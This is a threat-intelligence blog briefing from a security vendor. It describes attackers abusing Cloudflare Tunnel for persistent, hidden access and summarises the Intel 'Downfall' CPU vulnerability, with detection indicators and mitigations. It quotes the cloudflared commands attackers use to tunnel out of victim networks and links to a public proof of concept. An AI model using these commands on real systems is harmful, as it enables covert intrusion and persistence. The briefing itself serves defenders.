Cyber Threat Intelligence Briefing - August 14, 2023

Welcome back to another week of Cyber Threat Intelligence (CTI). This week's report highlights how threat actors are abusing the legitimate Cloudflare service ‘Cloudflare Tunnel’ to establish persistence and obfuscate activity and a new side-channel attack ‘Downfall’ disclosed for Intel processors.

New Cloudflare Tunnel Abuse

New research from Guidepoint Security highlights a new technique that abuses Cloudflare Tunnel (a.k.a. Cloudflared), which threat actors are leveraging for stealth and maintaining persistent access within a target network.

What is CloudFlare Tunnel?

Per Cloudflare's documentation, it provides a secure way to connect resources to Cloudflare without a publicly routable IP address.  It does not send traffic to an external IP, instead, the 'cloudflared' daemon creates outbound-only connections to the Cloudflare global network.  The Tunnel supports connections to HTTP servers, SSH servers, remote desktops, and other protocols.

How Threat Actors are Abusing Cloudflared

• Threat actor configures the Tunnel environment on their Cloudflare account.

• Threat actor gains access to the victim's machine via traditional methods (i.e. phishing, social engineering, remote exploit)

• Threat actor issues just a single command on the victim machine, establishing a persistent tunnel back to the attacker-controlled Cloudflare environment.

  • The only parameter that needs to be passed at the command line is the associated token with the tunnel the threat actor created.

cloudflared tunnel run --token <token from Cloudflare>

• Tunnel configurations are then stored in the running cloudflared
• Tunnel configurations can be changed on the fly by the threat actor.
• This allows the threat actor to perform a given task, then alter the configuration to further obfuscate their activity.
• All network traffic that is routed through this tunnel (SMB, RDP, etc.) is sent via the QUIC protocol over port 7844, masking the activity of the threat actor.

• • This 'private network' configuration is not updated in the configuration output on the command line, effectively hiding the configuration from defenders.

  • This allows the threat actor to interact with any device on the 'private network'.

    Cloudflare Tunnels also allows for entire CIDR ranges to have access to the tunnel.

    It should also be noted that Cloudflare has a TryCloudflare feature, which allows for users to create a single-use cloudflared tunnel.  This setup process would allow a threat actor to create a tunnel without providing identifying information to Cloudflare for attribution.

cloudflared tunnel --url http://localhost:<port>

• • This generates a random hostname that is used as a subdomain of trycloudflare[.]com, giving not just the threat actor access, but exposing the host to the whole internet.

How to Protect Your Organization from Cloudflare Tunnel Threats

While the tunnel itself provides a great layer of obfuscation for the threat actor, several indicators can be monitored for this type of activity:

• DNS requests to *update.argotunnel[.]com, protocol-v2.argotunnel[.]com, and .v2.argotunnel[.]com
• Outbound connection attempts to port 7844 (using the QUIC protocol)
• Command line arguments containing 'tunnel run -token'
• File hashes matching versions of the cloudflared daemon, found here.

Additional CloudFlare Tunnel Resources

• https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/
  
• https://www.bleepingcomputer.com/news/security/hackers-increasingly-abuse-cloudflare-tunnels-for-stealthy-connections/
  
• https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/
  
• https://www.networkstraining.com/what-is-quic-protocol/
  
• https://github.com/cloudflare/cloudflared/releases

'Downfall' Side-Channel Attack (CVE-2022-40982)

Last week, security researchers at Google published research for a new side-channel attack against certain Intel CPU architectures.  The vulnerability is tracked as CVE-2022-40982 and is nicknamed 'Downfall'.  If exploited under the correct conditions, the vulnerability can lead to disclosure of passwords, cryptographic keys, and other sensitive information.

Which Devices are Vulnerable to 'Downfall'?

This vulnerability affects Intel Server CPUs, from the 6th (Skylake) generation to 11th (Tiger Lake) generation processors.  A full list of vulnerable CPU models can be found on Intel's site here.

What are the Conditions for the 'Downfall' Vulnerability?

For this vulnerability to be successfully exploited, the threat actor needs to be sharing the same physical processor core.  This scenario is most common in cloud computing.  The threat actor would need to download a malicious payload and execute the payload on the same physical processor as the victim.  Given the specific conditions that need to be met to carry out the attack, the overall risk is considered to be low.  However, proof-of-concept code has been published to Github, as well as detailed research and documentation of the vulnerability, making potential public exploitation a possibility.

What are the Mitigations for the 'Downfall' Vulnerability?

Intel has a microcode update that can mitigate the vulnerability, which can be found here. Additional information from Intel regarding the vulnerability can be found here.

It should be noted that applying this update can result in up to 50% performance degradation. Organizations must decide if negating the risk of exploitation is worth the performance penalty of the CPU.

• https://downfall.page/
  
• https://github.com/flowyroll/downfall/tree/main/POC
  
• https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files
  
• https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html

PacketWatch publishes this report and other cybersecurity threat intel to the security community for free via our blog. If you are interested in personalized threat intel, contact us today to learn about our enterprise threat intelligence services.

Disclaimer

Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.